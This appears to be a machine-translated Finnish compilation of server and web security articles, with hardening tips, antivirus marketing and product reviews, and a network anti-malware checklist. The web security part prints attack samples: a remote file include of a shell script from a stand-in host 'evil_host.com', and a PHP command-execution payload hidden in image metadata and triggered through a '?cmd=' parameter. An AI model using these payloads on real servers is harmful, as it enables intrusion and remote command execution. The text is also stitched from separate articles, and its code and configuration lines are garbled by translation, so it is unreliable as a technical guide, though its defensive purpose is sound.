- Ennen kuin parametri välitetään pyyntöön, sen tyyppi on tarkistettava (PHP:lle - is_bool(), is_float(), is_int(), is_string(), is_object(), is_array() ja is_integer()) ja vähintään , lainattu käyttämällä PHP:n addslashes-tyyppistä rakennetta.
- Kaikki komentosarjat toimivat tietokannan kanssa joltakin tietokantatililtä, poista tältä tililtä kaikki oikeudet, joita ei tarvita työhön. Usein hakkerit käyttävät MySQL-komentoa (MySQL on esimerkkinä, tämä koskee mitä tahansa SQL-palvelinta) "LOAD DATA INFILE" lukeakseen tarvitsemansa tiedostot palvelimesta ja luettavasta tilistä, jolla MySQL toimii. Tästä syystä johtopäätös, poista tarpeettomat oikeudet skripteiltäsi, kuten FILE, joita tarvitaan LOAD DATA INFILE -komennon käyttämiseen. "Perusminimi" -periaate olisi otettava perustaksi.
- Järjestelmätilillä, jolla SQL-palvelin toimii, ei pitäisi olla pääsyä sivuston sivuille ja palvelimen järjestelmätiedostoille.
Tiedostojen yhdistäminen. Sisällytä tiedosto. Oletetaan, että on olemassa sivu site.com/getnews.php?file=190607, mutta komentosarjan kirjoittaja käyttää include-toimintoa ja yhdistää sivun ilman tarkistuksia.
$tiedosto = $_REQUEST["tiedosto"];
include($tiedosto..html");
Hakkeri korvaa osoitteen evil_host.com/shell.php osoitteen 190607 sijaan, jolloin hakkeriselaimen koko osoitepalkki näyttää tältä site.com/postnews.php?file=evil_host.com/shell.php ja hakkeri saa oman web-kuoren sivustossasi Apachella olevilla oikeuksilla.

Tiedostoyhteyden suojaus:
- Tarkista ja suodata komentosarjoissasi kaikki parametrit, jotka käyttäjä syöttää ja jotka välitetään komentosarjalle osoitepalkin kautta. Löydä ohjelmointikielellesi materiaalia, joka opettaa sinua koodaamaan turvallisesti.
- Hakkerit pitävät todella siitä, kun sivuston ohjelmointikieli mahdollistaa järjestelmäkomentojen suorittamisen. Siksi sinun on kiellettävä tällaisten toimintojen kutsuminen ohjelmointikielelläsi, jos tämä tietysti on mahdollista. Esimerkiksi PHP-asetuksissa on mahdollista määrittää lista "kielletyistä" funktioista käyttämällä disable_functions-funktiota tiedostossa php.ini.
Troijalainen kuva
Jos sinulla on mahdollisuus ladata tiedostoja sivuston palvelimelle, ole valmis lataamaan esimerkiksi avatar-kuvia. JPEG-muodossa olevassa kuvassa on metatietojen käsite (muista, että kamera kirjoittaa tietoja kuvattaessa kehystä) ja tämä metatieto kirjoitetaan
";passthru($_GET["cmd"]);echo ""; ?>
kuva nimetään uudelleen avatara.jpg.php ohittamaan useimmat laajennustarkistukset ja käyttää site.com/upload_images/avatara.jpg.php?cmd=server_commands

Troijan suojaus:
- Tarkista tiedostopääte oikein. Vaikka käsitteletkin sallittuja tiedostoja oikein, varaudu siihen, että kuva jpg:stä php:ksi nimetään uudelleen käyttämällä sivustosi toista haavoittuvuutta. Tarkista metatiedot kuvasta funktioilla, kuten exif_read_data() PHP:ssä.
- Estä ohjelmointikielten suorittaminen kuvahakemistoissa verkkopalvelimesi avulla. Voit tehdä tämän katsomalla Apachen konfigurointirivejä, kuten "AddType application/x-httpd-", jotka yhdistävät ohjelmointikielet tiedostopäätteisiin ja estävät niiden suorittamisen hakemistoissa, joissa on kuvia. Apachelle PHP-kielitiedostojen suorittamisen kieltäminen on konstruktio
  
  Tilaus hylätään, sallitaan
  Kiellä kaikilta
- Löydä ohjelmointikielellesi materiaalia, joka opettaa sinua koodaamaan turvallisesti, kun käsittelet kuvia ja lataat ne oikein palvelimelle.

Henkilökohtaiset kiitokset:

ystävä Alexander Pupyshev eli ilves kritiikistä ja neuvoista
sivusto antichat.ru/
www.xakep.ru/
Kirja Michael Eben, Brian Taiman. FreeBSD:n hallinto: Tasapainotuksen taito
kirja Joel Scambray, Stuart McClure, George Kurtz. Hakkereiden salaisuudet: Verkkoturvallisuus - valmiit ratkaisut. Toinen painos

Muita suojatietolähteitä:

FreeBSD:n man security man -sivu sisältää kuvauksen yleisistä tietoturvaongelmista ja hyvistä hallintokäytännöistä.
Tilaa freebsd-security @ freebsd.org -postituslistat. Voit tehdä tämän lähettämällä sähköpostin osoitteeseen majordomo @ freebsd.org ja merkitsemällä viestin tekstiosassa tilauksen freebsd-security. Tällä postituslistalla käsitellään kiireellisimpiä tietoturvakysymyksiä.
FreeBSD:n tietoturvatietosivu freebsd.org/security/
FreeBSD-turvallisuusopas
CERT.org-sivustolla on tietoa aiheesta haavoittuvuuksia ah kaikkien käyttöjärjestelmien suojauksessa.
Firewalls & Internet Security, William R. Cheswick ja Steven M. Bellowin
Internet-palomuurien rakentaminen, 2. painos, Brent Chapman ja Elizabeth Zwicky

Tulokset:
Toivon, että artikkeli auttoi sinua näkemään kaikki ongelmat yhdessä, nyt järjestelmänvalvojan on luettava tietoturvasta, tietokannoista, verkkopalvelimista ja ohjelmointikielistä muista lähteistä. Tiivistäen artikkelin lyhyesti, sinun on oltava tietoinen tietoturvaongelmien vapautumisesta, päivitettävä ja tarkistettava kaikki syötetyt tiedot kehityksesi oikeellisuuden varalta.
Olkoon voima kanssasi!

Jotta yrityksen ohjelmistopalvelut toimisivat menestyksekkäästi ilman vikoja, laadukas asennus, ja virussuojauksen määrittäminen. Nykyään mikään yritys ei tule toimeen ilman Internetin käyttöä kirjanpitoon, liikekirjeenvaihtoon ja raportointiin. CRM-järjestelmä on erittäin suosittu, mutta sen työn laatu riippuu suoraan yhteydestä maailmanlaajuiseen verkkoon.

Edut asennukset virustorjuntaohjelmisto

Virustorjunta tuotteet toimivat suojaa eri tasoilla. Ohjelmat auttavat estämään ongelmia, kuten:

tietojen varastaminen etäkäytön kautta palvelin, mukaan lukien luottamukselliset tiedot (esimerkiksi tiedot yrityksen tileihin pääsyä varten);
erilaisten asiakassovellusten käyttöönotto käyttöjärjestelmään DDoS-hyökkäysten suorittamiseksi;
yrityksen laitteiden vika eri ohjelmien haitallisten vaikutusten vuoksi;
tukkeutuminen, toiminnan edellyttämien ohjelmien vaurioituminen ja palvelimia;
luottamuksellisten tietojen varkaus, väärentäminen tai tuhoaminen.

Yhteenvetona johtopäätös on yksi - täytäntöönpano virustorjunta pohja auttaa yritystä välttämään suuria taloudellisia tappioita. Lisäksi tämä ei koske vain mahdollisen hakkeroinnin estämistä palvelimia, mutta myös laitteiden ja maksullisten verkkojärjestelmien toimivuuden säilyttämiseksi. Siksi kysymys asetukset laadukasta ja tehokasta suojaa aina ajankohtainen kaikenkokoisille yrityksille.

Suosituin ohjelmisto asennukset toimistossa

Useimmiten asiakkaat haluavat asetusta erilaisia virustorjuntaversioita Kaspersky. Tämän ohjelmistotuotteen suosio johtuu seuraavista ominaisuuksista:

suuri määrä vaihtoehtoja sekä pienille, keskisuurille että suurille yrityksille, erillinen rivi kotikäyttöön;
ohjelmistokompleksit Kaspersky suunniteltu asennus ei vain toimistossa palvelimia, mutta myös päällä matkapuhelimet, kannettavat tietokoneet;
palvelimia yhteistyö, sähköposti, erilaiset tiedostot on suojattu turvallisesti antiviraalinen tuote
virustorjunta Kaspersky estää hyökkäyksiä Internet-yhdyskäytäviin;
asetusta tuote poistaa sisäisen hyökkäyksen uhan palvelimia, koska se edellyttää käyttöoikeuksien eriyttämistä.

Muiden etujen joukossa asennukset määritetystä virustorjuntajärjestelmästä - tietojen varmuuskopiointi, salasanan tallennus ja Internet-lomakkeiden automaattinen täyttö vikasietotilassa, mikä estää pääsyn palvelimia roskapostia, tietojenkalastelua. Lisäksi hinta suojaa nämä tuotteet ovat erittäin hyödyllisiä. Käyttäjille, jotka ovat vähän perehtyneet ohjelmoinnin monimutkaisuuteen, virustorjuntakehittäjät Kaspersky loi kätevän, yksinkertaisen ja intuitiivisen käyttöliittymän.

Mitä ottaa huomioon valittaessa tietoturvaohjelmistoa?

suojella mitä palvelimia erityiset ohjelmistot lasketaan: koti, pienet ja keskisuuret yritykset, suuret yritykset;
ehdotettujen paikallisten ohjelmien kattavuus palvelimia liiketoiminta;
työn jatkuvuus, päivitysten tiheys ja ehdot;
mahdollisuus virustentorjuntajärjestelmän keskitettyyn hallintaan;
ehdotetun tuotteen yhteensopivuus asennettujen yritysohjelmien ja muiden ohjelmistojen kanssa.

Tärkeä asia on myös sellaisia tuotteita toteuttavan yrityksen valinta. Pätevä työntekijä luo oikean työn mahdollisimman lyhyessä ajassa ja opastaa asiakkaita käyttämään ohjelmatyökaluja työskennellessään palvelimia. Tällaisten palvelujen tarjoamisen kustannuksilla on tärkeä rooli - yrityksessämme se on aina erittäin kannattavaa.

Palvelinta on mahdotonta suojata ulkoisilta pääsyltä lopullisesti, koska joka päivä havaitaan uusia haavoittuvuuksia ja uusia tapoja hakkeroida palvelin ilmaantuu. Puhumme palvelimien suojaamisesta luvattomalta käytöltä tässä artikkelissa.

Minkä tahansa yrityksen palvelimet voivat ennemmin tai myöhemmin joutua hakkeroinnin tai virushyökkäyksen kohteeksi. Tyypillisesti tällaisen hyökkäyksen seurauksena on tietojen menetys, maine- tai taloudellinen vahinko, joten palvelimen tietoturvakysymykset tulisi käsitellä ensisijaisesti.

On ymmärrettävä, että suojaus palvelimen hakkerointia vastaan on joukko toimenpiteitä, mukaan lukien ne, jotka edellyttävät palvelimen toiminnan jatkuvaa seurantaa ja työtä suojauksen parantamiseksi. Palvelinta on mahdotonta suojata ulkoisilta pääsyltä lopullisesti, koska joka päivä havaitaan uusia haavoittuvuuksia ja uusia tapoja hakkeroida palvelin ilmaantuu.

Puhumme palvelimien suojaamisesta luvattomalta käytöltä tässä artikkelissa.

Tapoja ja menetelmiä palvelimien suojaamiseksi luvattomalta käytöltä

Palvelimen fyysinen suojaus

Fyysinen suoja. On toivottavaa, että palvelin sijaitsee suojatussa konesalissa, suljetussa ja vartioidussa huoneessa, ulkopuolisilla ei saa olla pääsyä palvelimelle.

Aseta SSH-todennus

Kun määrität pääsyä palvelimeen, käytä SSH-avaimen todennusta salasanan sijasta, koska tällaiset avaimet ovat paljon vaikeampia ja joskus yksinkertaisesti mahdottomia murtaa raa'alla voimalla.

Jos uskot, että tarvitset edelleen salasanan, muista rajoittaa sen antamisyritysten määrää.

Huomioi, jos näet seuraavanlaisen viestin kirjautuessasi sisään:

Viimeisin epäonnistunut kirjautuminen: ti 28. syyskuuta 12:42:35 MSK 2017 alkaen 52.15.194.10 osoitteessa ssh:notty
Epäonnistuneita kirjautumisyrityksiä oli 8243 edellisen onnistuneen kirjautumisen jälkeen.

Se voi tarkoittaa, että palvelimeesi on hakkeroitu. Tässä tapauksessa voit määrittää palvelimen suojauksen muuttamalla SSH-porttia, rajoittamalla IP-osoitteiden luetteloa, joilta pääsy palvelimeen on mahdollista, tai asentamalla ohjelmiston, joka estää automaattisesti liian usein toistuvan ja epäilyttävän toiminnan.

Asenna uusimmat päivitykset säännöllisesti

Palvelimen suojauksen varmistamiseksi asenna käyttämäsi palvelinohjelmiston - käyttöjärjestelmä, hypervisor, tietokantapalvelin - viimeisimmät korjaustiedostot ja päivitykset ajoissa.

On suositeltavaa tarkistaa uudet korjaustiedostot, päivitykset ja raportoidut bugit/haavoittuvuudet päivittäin, jotta voidaan estää hyökkäyksiä, jotka hyödyntävät nollapäivän haavoittuvuuksia. Voit tehdä tämän tilaamalla ohjelmistokehitysyrityksen uutisia, seuraamalla sen sivuja sosiaalisissa verkostoissa.

Suojaa salasanat

Ylivoimaisesti yksi yleisimmistä tavoista päästä palvelimeen on murtaa palvelimen salasana. Noudata siksi hyvin tunnettuja, mutta kuitenkin asiaankuuluvia suosituksia, jotta et jätä palvelinta suojaamatta:

älä käytä helposti arvattavia salasanoja, kuten yrityksen nimeä;
jos käytät edelleen hallintakonsolin oletussalasanaa, vaihda se välittömästi;
eri palvelujen salasanojen on oltava erilaisia;
jos sinun on jaettava salasanasi jonkun kanssa, älä koskaan lähetä IP-osoitettasi, käyttäjätunnustasi ja salasanaasi samassa sähköpostissa tai messenger-viestissä;
Voit määrittää 2-vaiheisen vahvistuksen kirjautumaan järjestelmänvalvojan tilille.

palomuuri

Varmista, että palvelimella on , se on määritetty ja että se on käynnissä koko ajan.
Suojaa sekä saapuvaa että lähtevää liikennettä.
Seuraa, mitkä portit ovat auki ja mihin tarkoitukseen, älä avaa mitään tarpeetonta vähentääksesi mahdollisten haavoittuvuuksien määrää palvelimen hakkerointiin.

Erityisesti palomuuri on erittäin hyödyllinen suojaamaan palvelinta ddos-hyökkäyksiltä, koska Voit nopeasti luoda estäviä palomuurisääntöjä ja lisätä IP-osoitteita, joista hyökkäys tulee, tai estää pääsyn tiettyihin sovelluksiin tiettyjä protokollia käyttäen.

Valvonta ja tunkeutumisen havaitseminen

Rajoita palvelimellasi käynnissä olevia ohjelmistoja ja palveluita. Tarkista säännöllisesti kaikki, mitä sinulla on käynnissä, ja jos löydät tuntemattomia prosesseja, poista ne välittömästi ja aloita virusten tarkistaminen.
Tarkista ajoittain peukaloinnin merkkejä. Hakkerointi voi olla todisteita uusista käyttäjätilistä, joita et ole luonut, tai siirtänyt tai poistanut tiedostoa /etc/syslog.conf, poistetut tiedostot /etc/shadow Ja /etc/passwrd.
Tarkkaile palvelintasi, pidä silmällä sen normaalia nopeutta ja suorituskykyä, jotta voit huomata poikkeamia esimerkiksi silloin, kun palvelimen kuormitus on kasvanut huomattavasti tavallista enemmän.

VPN:n ja SSL/TLS-salauksen käyttö

Jos tarvitaan etäkäyttöä palvelimelle, se on sallittava vain tietyistä IP-osoitteista ja tapahduttava VPN:n kautta.

Seuraava askel turvallisuuden varmistamisessa voi olla SSL:n käyttöönotto, joka ei vain salaa tietoja, vaan myös varmistaa muiden verkkoinfrastruktuurin osallistujien henkilöllisyyden myöntämällä heille asianmukaiset varmenteet.

Palvelimen turvatarkastus

Palvelimen turvallisuus olisi hyvä tarkistaa itsenäisesti pentest-menetelmällä, ts. hyökkäyssimulaatio löytääksesi mahdollisia haavoittuvuuksia ja poistaaksesi ne ajoissa. On suositeltavaa ottaa tähän mukaan asiantuntijoita tietoturva jotkin testit voidaan kuitenkin tehdä itsenäisesti palvelinhakkerointiohjelmilla.

Mikä muu uhkaa palvelimia kuin hakkerointi

Palvelin voi kaatua useista muista syistä kuin hakkeroinnin vuoksi. Se voi olla esimerkiksi haittaohjelmatartunta tai vain jonkin komponentin fyysinen vika.

Siksi palvelimen suojaustoimenpiteisiin tulisi kuulua:

Palvelimen suojaamiseen tarkoitettujen ohjelmien asennus ja päivitys - virustorjunta.
Säännölliset salatut kopiot tiedoista vähintään kerran viikossa, koska tilastojen mukaan palvelinkiintolevyt ovat ensimmäisellä sijalla vikojen tiheydellä. Varmista, että varmuuskopio on tallennettu fyysisesti turvalliseen ympäristöön.
Palvelinhuoneen keskeytymättömän virransyötön varmistaminen.
Palvelimien oikea-aikainen fyysinen estäminen, mukaan lukien niiden puhdistaminen pölystä ja lämpötahnan vaihtaminen.

Integruksen asiantuntijoiden kokemus kertoo, että paras suoja tällaisia uhkia vastaan on palvelinsuojausjärjestelmien parhaiden käytäntöjen soveltaminen.

Varmistaaksemme asiakkaidemme palvelimien turvallisuuden, käytämme työkalujen yhdistelmää: palomuurit, virukset, tietoturva-/tapahtumanhallintateknologiat (SIM/SEM), tunkeutumisen havainnointi-/suojaustekniikat (IDS/IPS), verkkokäyttäytymisen analysointitekniikat (NBA) , tietysti säännölliset ennaltaehkäisevät palvelimet ja suojattujen palvelinhuoneiden järjestely avaimet käteen -periaatteella. Näin voit minimoida hakkeroinnin tai muista syistä johtuvan palvelimen epäonnistumisen riskit.

Olemme valmiita suorittamaan yrityksesi palvelimien turvatarkastuksen, konsultoimaan asiantuntijoita, suorittamaan kaikenlaisia palvelinlaitteiden suojauksen asennukseen liittyviä töitä.

Palvelin on erikoistunut tietokone, jonka toiminnot tapahtuvat ilman käyttäjän aktiivista osallistumista. Yleensä siellä on palvelu ohjelmisto suorittamaan tiettyjä tehtäviä. Tällaisen tietokoneen kautta vaihdetaan tietoja, käynnistetään toimia, suoritetaan matemaattisia laskelmia ja paljon muuta. Kaikki palvelimet eroavat tyypeittäin, on esimerkiksi peli-, web-, sähköposti- ja välityspalvelimia. Jokainen tällainen laite suorittaa selkeästi määritellyn tehtävän. Usein tällaisen koneen turvallisen toiminnan varmistamiseksi siihen asennetaan virustorjunta, joten haluaisimme kertoa sinulle lisää sellaisista ohjelmistoista korostaen muutamia erityisiä ratkaisuja.

Alusta: Windows Server

Tunnettu virustorjuntayritys Avast julkaisee erityisesti palvelimille tarkoitetun kokoonpanon, joka tarjoaa hyödyllisiä lisätyökaluja. Katso esimerkiksi toimintoa "Tietojen tuhoaminen". Se on toteutettu siten, että se korvaa satunnaisesti luodut tiedot kaikissa poistetuissa tiedoissa, mikä ei salli tiedoston alkuperäisen tilan palauttamista yritettäessä palauttaa sitä. Lisäksi on "Käyttäytymisanalyysi"- työkalu, joka vastaa työhakemusten skannaamisesta epäilyttävän toiminnan varalta. Jos Notepad yrittää käyttää samaa verkkokameraa, tällainen pyyntö estetään välittömästi. Tällainen esimerkki on tietysti yksinkertainen, mutta toiminto toimii korkeammalla tasolla.

Avast Business Antivirus Prossa on myös sisäänrakennettu palomuuri, älykäs tarkistus, roskapostisuojaus, salasanasuojaus ja helpompi kirjautuminen sisään. Myös todennäköisiä uhkia verrataan jatkuvasti nykyiseen virustietokantaan Software Defense -teknologian avulla. Sen avulla voit olla vuorovaikutuksessa vain vahvistettujen tietojen kanssa. CyberCapture-työkalu puolestaan lähettää epäilyttävät esineet Threat Labiin.

Avira Antivirus Server

Alusta: Windows Server

Avira Antivirus Server on kehittäjän erikoisratkaisu Windows-käyttöjärjestelmää käyttäville palvelimille. Tekijät lupaavat maksimaalisen tehokasta työtä alhainen järjestelmäresurssien kulutus, korkea uhkien havaitsemisnopeus ja helppokäyttöisyys. Kokoonpanoon on lisätty työkaluja pääsyn suojaamiseen, eli se valvoo käynnissä olevia prosesseja, kun muut sovellukset käyttävät niitä. On myös manuaalinen skannaus, jonka avulla voit aloittaa määritetyn median tai erillisen hakemiston analysoinnin milloin tahansa.

Jälleen kerran huomautamme, että kehittäjä korostaa erityisesti PC-resurssien vähäistä kulutusta ja virustentorjuntahallinnan helppoutta. Luvataan myös jatkuvia ilmaisia innovaatioita ja virustietokantapäivityksiä. Jos olet kiinnostunut tutustumaan tähän tuotteeseen, voit saada ilmaisen version 30 päivän ajaksi viralliselta verkkosivustolta täyttämällä asianmukaisen lomakkeen. Testauksen aikana kaikki työkalut ja toiminnot ovat käytettävissä sekä ilmainen yhteydenotto tukipalveluun.

ESET File Security

ESET File Security on suunniteltu toimimaan Windows- ja Linux-palvelimilla, ja se tarjoaa monikerroksisen suojauksen ESET Dynamic Threat Defense -pilvihiekkalaatikkokomponentin ansiosta. Pilvipohjainen suojausjärjestelmä suojaa automaattisesti uusia uhkia vastaan odottamatta tunnistusmoottorin päivitystä (määritetty keskimääräinen päivitysaika on 20 minuuttia). Sisäänrakennettu verkkohyökkäyssuojaus tunnistaa tunnetut haavoittuvuudet verkkotasolla, ja OneDrivea käytettäessä Office 365 OneDrive -tallennuskone tarkistaa sen. Huomiota tulee kiinnittää myös botnet-verkkojen vaikutuksen estämiseen. Työkalu ei vain löydä haitallista yhteyttä, vaan myös havaitsee samat prosessit, estää välittömästi vaarallisen toiminnan ja ilmoittaa siitä käyttäjälle.

ESET File Securityn hallintaa varten käyttäjää kehotetaan asentamaan konsoli Windowsiin tai Linuxiin, ja käytössä on virtuaalinen tuontilaite asennuksen yksinkertaistamiseksi. Voit tutustua tämän virustorjunnan kaikkiin toimintoihin, kokeilla sen ilmaista versiota ja ostaa täyden version kehittäjien viralliselta verkkosivustolta.

kaspersky turvallisuus

Alusta: Windows Server, Linux

Kaspersky Security for Servers sisältyy kokoonpanoihin - Total, Endpoint Security for Business, Kaspersky Security for Virtual and Cloud Environments ja Kaspersky Security for Storage Systems. Ostamalla yhden näistä versioista saat luotettavan suojan palvelimellesi uusin sukupolvi haittaohjelma. Kyseisessä ohjelmistossa on edistynyt palvelinsuojaus ja se tarjoaa suojan hyväksikäyttöjä vastaan, päätepalvelimien suojauksen, valvoo ulkoista liikennettä, järjestelmän eheyttä ja suojaa jatkuvasti tietotallennusjärjestelmiä monitasoisen työkalun avulla. Sisäänrakennetut järjestelmänvalvojan oikeuksien hallintajärjestelmät tarjoavat helpon hallinnan, ilmoitukset sekä integroinnin SIEM-järjestelmiin ja Windowsin palomuurin hallintaan.

Haluan huomata, että Kaspersky Securityllä on erillinen Laitteistovaatimukset tietyille tallennusalustoille, esimerkiksi NetApp - Clustered Data ONTAP 8.x ja 9.x ja Data ONTAP 7.x ja 8.x 7-moodissa ja EMC Isilon - IBM System Storage N -sarjalle. Voit tutustua kaikkien vaatimusten luetteloon lataaessasi virustorjuntaa Kasperskyn verkkosivustolta.

McAfee VirusScan Enterprise

Alusta: Windows Server, Linux

Aiemmin käyttäjät asensivat McAfee Endpoint Securityn palvelimilleen, mutta kehittäjät päättivät parantaa tätä tuotetta muuttamalla sen nimeä edelleen. Nyt se on VirusScan Enterprise. Kaikille, jotka ovat aiemmin käyttäneet tätä virustorjuntaa, tarjotaan ilmainen siirto. Virallisella verkkosivustolla on kaikki tarvittavat ohjeet ja oppitunnit tästä asiasta. perustyökalupakettiin uusi versio sisältää: palomuurin, uhkaviestinnän web-ohjaimet, pakolliset virustentorjunnan ja hyväksikäytön estovaihtoehdot.

McAfee VirusScan Enterprise käyttää myös nykyaikaisia koneoppimistekniikoita. Tällaiset tekniikat mahdollistavat haitallisen koodin havaitsemisen staattisten ja käyttäytymisominaisuuksien avulla. Haittaohjelmat suljetaan heti, kun ne tulevat järjestelmään, mikä estää niitä tartuttamasta muita prosesseja. Endpoint Detection and Tesponse -tekniikka vastaa päätepisteiden havaitsemisesta ja reagoinnista – tämän avulla voit vastata uhkiin yhdellä napsautuksella.

Comodo Antivirus Linuxille

Alusta: Linux

Comodo Antivirus -ohjelman kehittäjät ovat esittäneet erillisen version Linux-ytimeen perustuville käyttöjärjestelmille. Tätä ohjelmaa tukevat useimmat jakelut, sekä 32-bittiset että 64-bittiset.Ominaisuuksista haluaisin heti huomioida sähköpostisuodattimen, joka on yhteensopiva suosittujen sähköpostiagenttien kanssa: Postfix, Qmail, Sendmail ja Exim MTA. Valmistaja takaa luotettavan reaaliaikaisen suojauksen, helpon asennuksen ja ilman monimutkaisia konfigurointivaiheita. Roskapostin estojärjestelmää voidaan muokata täysin manuaalisesti, mutta vakioasetukset tarjoavat hyvä suodatus. Jos käyttäjä haluaa hallita tiedostoja entistä enemmän, käytettävissä on toiminto, joka voidaan ottaa käyttöön "Reaaliaikainen käyttäytymisanalyysi". Kaikki epäilyttävät objektit lähetetään pilvikäyttäytymisanalyysipalvelimelle.

Comodo Antivirus -ohjelman käyttömukavuutta varten tarvitset tehokkaan tietokoneen, jonka prosessoritaajuus on vähintään 2 GHz ja 2 Gt vapaata RAM-muistia. Sinun ei tarvitse huolehtia tarkistusten suorittamisesta: riittää, että määrität heidän suunnitelmansa vain kerran, ja tulevaisuudessa ne käynnistetään automaattisesti. Analyysi voidaan aloittaa milloin tahansa sopivana ajankohtana painamalla vain yhtä painiketta. Kyseinen virustorjunta on avoimen lähdekoodin, jaettu ilmaiseksi ja ladattu viralliselta verkkosivustolta.

Chkrootkit

Alusta: Linux

Chkrootkit (Check Rootkit) on järjestelmänvalvojien laajalti käyttämä ohjelma suojatakseen käyttöjärjestelmää tunnetuilta rootkit-ohjelmilta. Rootkit on kokoelma komponentteja, kuten komentosarjoja, suoritettavia tiedostoja tai määritystiedostoja, jotka suorittavat tietojen peittämis-, ohjaus- ja keräämistoiminnon. Tällaisten työkalujen avulla hyökkääjät tunkeutuvat käyttöjärjestelmään ja saavat kaikki tarvittavat tiedot. Yllä mainittu ohjelmisto on vain suunniteltu suojaamaan tietokonetta tällaiselta toiminnalta. Chkrootkit ei vaadi asennusta, ja se voidaan ajaa Live CD:ltä. Työskentely siinä tapahtuu minkä tahansa kätevän konsolin kautta, ja hallinta on selvää jopa kokemattomalle käyttäjälle.

Chkrootkit toimii melko nopeasti, tekee työnsä hyvin, ei vie paljon tilaa asemalta, mutta sisältää samalla valtavan määrän moduuleja jokaiselle käyttäjätyypille. Virallisella verkkosivustolla on ohjelman kokoonpanoja useissa laajennuksissa, ja lataus on saatavilla suorasta lähteestä tai useista peileistä.

Olet tutustunut virustorjuntaratkaisuihin, joista tulee paras ratkaisu varten erilaisia tyyppejä palvelimia. Kuten näet, jokaisella ohjelmistolla on omat ominaisuutensa, joten se on hyödyllisin tietyissä tilanteissa.

Kuinka järjestää tietokoneverkkojen suojaus haittaohjelmilta oikein.

Artikkeli on osoitettu aloitteleville järjestelmänvalvojille.

Virustorjunnalla tarkoitan suojaa kaikenlaisilta haittaohjelmilta: virukset, troijalaiset, juuripaketit, takaovet,…

1 Virustorjuntavaihe - asenna virustorjuntaohjelmisto jokaiseen verkon tietokoneeseen ja päivitä se vähintään päivittäin. Oikea kaava virustorjuntatietokantojen päivitykset: 1-2 palvelinta hakee päivityksiä ja jakaa päivitykset kaikille verkon tietokoneille. Muista asettaa salasana suojauksen poistamiseksi käytöstä.

Virustorjuntaohjelmistolla on monia haittoja. Suurin haittapuoli on, että ne eivät tartu tilauksesta kirjoitettuihin viruksiin, joita ei käytetä laajalti. Toinen haittapuoli on, että ne lataavat prosessorin ja vievät muistia tietokoneissa, jotkut enemmän (Kaspersky), jotkut vähemmän (Eset Nod32), tämä on otettava huomioon.

Virustorjuntaohjelmiston asentaminen on pakollinen, mutta riittämätön tapa suojautua virusepidemialta, usein virustunniste ilmestyy virustorjuntatietokantoihin seuraavana päivänä levittämisen jälkeen, 1 päivässä virus voi lamauttaa minkä tahansa tietokoneverkon toiminnan.

Yleensä järjestelmänvalvojat pysähtyvät vaiheessa 1, mikä pahempaa, he eivät suorita sitä loppuun tai eivät seuraa päivityksiä, ja ennemmin tai myöhemmin tartunta kuitenkin tapahtuu. Alla luetellaan muita tärkeitä toimia virustorjunnan vahvistamiseksi.

Vaihe 2 Salasanapolitiikka. Virukset (troijalaiset) voivat tartuttaa verkossa olevia tietokoneita arvaamalla salasanat vakiotileille: root, admin, Administrator, Administrator. Käytä aina monimutkaisia salasanoja! Jos tilillä ei ole salasanoja tai yksinkertaisia salasanoja, järjestelmänvalvojalle tulee antaa vastaava merkintä työkirjaan. 10 virheellisen salasanan syöttämistä koskevan yrityksen jälkeen tili tulee estää 5 minuutiksi raa'alta voimalta suojaamiseksi (salasanan arvaus yksinkertaisella luettelolla). On erittäin suositeltavaa nimetä sisäänrakennetut järjestelmänvalvojan tilit uudelleen ja poistaa ne käytöstä. Salasanat on vaihdettava säännöllisesti.

3 Vaihe. Käyttöoikeuksien rajoitus. Virus (troijalainen) leviää verkossa sen käynnistäneen käyttäjän puolesta. Jos käyttäjän oikeuksia rajoitetaan: ei ole pääsyä muihin tietokoneisiin, ei järjestelmänvalvojan oikeuksia hänen tietokoneeseensa, silloin edes käynnissä oleva virus ei voi tartuttaa mitään. Ei ole harvinaista, että järjestelmänvalvojat itse joutuvat syyllisiksi viruksen leviämiseen: he käynnistivät admin-avaingenin ja virus tarttui kaikkiin verkon tietokoneisiin ...

4 Vaihe. Säännöllinen tietoturvapäivitysten asennus. Se on kovaa työtä, mutta se on tehtävä. Sinun ei tarvitse päivittää vain käyttöjärjestelmää, vaan myös kaikkia sovelluksia: DBMS, sähköpostipalvelimet.

Vaihe 5 Virusten tunkeutumistapojen rajoittaminen. Virukset pääsevät yrityksen paikallisverkkoon kahdella tavalla: siirrettävän tietovälineen ja muiden verkkojen (Internet) kautta. Estät pääsyn USB:hen, CD-DVD:hen, estät kokonaan yhden tavan. Rajoittamalla pääsyä Internetiin estät toisen polun. Tämä menetelmä on erittäin tehokas, mutta vaikea toteuttaa.

6 Vaihe. Palomuurit (ITU), ne ovat myös palomuurit (palomuurit), ne ovat myös palomuurit. Ne on asennettava verkon rajoihin. Jos tietokoneesi on suoraan yhteydessä Internetiin, ITU:n on oltava käytössä. Jos tietokone on kytketty vain lähiverkkoon (LAN) ja käyttää Internetiä ja muita verkkoja palvelimien kautta, ITU:ta ei tarvitse ottaa käyttöön tässä tietokoneessa.

Vaihe 7 Yritysverkon jakaminen aliverkkoihin. Verkko on kätevä katkaista periaatteen mukaan: yksi osasto yhdessä aliverkossa, toinen osasto toisessa. Aliverkot voidaan jakaa fyysiselle kerrokselle (SCS), datalinkkikerrokselle (VLAN) ja verkkokerrokselle (aliverkot, joita ip-osoitteet eivät leikkaa).

Vaihe 8 Windowsilla on loistava työkalu suurten tietokoneryhmien turvallisuuden hallintaan - nämä ovat ryhmäkäytäntöjä (GPO). GPO:n avulla voit määrittää tietokoneet ja palvelimet niin, että haittaohjelmien tartuttaminen ja leviäminen tulee lähes mahdottomaksi.

Vaihe 9 Pääsy terminaaliin. Nosta verkkoon 1-2 päätepalvelinta, joiden kautta käyttäjät pääsevät Internetiin ja heidän henkilökohtaisten tietokoneidensa tartunnan todennäköisyys putoaa nollaan.

Vaihe 10 Pidä kirjaa kaikista tietokoneilla ja palvelimilla käynnissä olevista prosesseista ja palveluista. Voit tehdä sen niin, että kun tuntematon prosessi (palvelu) käynnistyy, järjestelmänvalvojalle ilmoitetaan. Kaupalliset ohjelmistot, jotka voivat tehdä tämän, maksavat paljon, mutta joissain tapauksissa kustannukset ovat perusteltuja.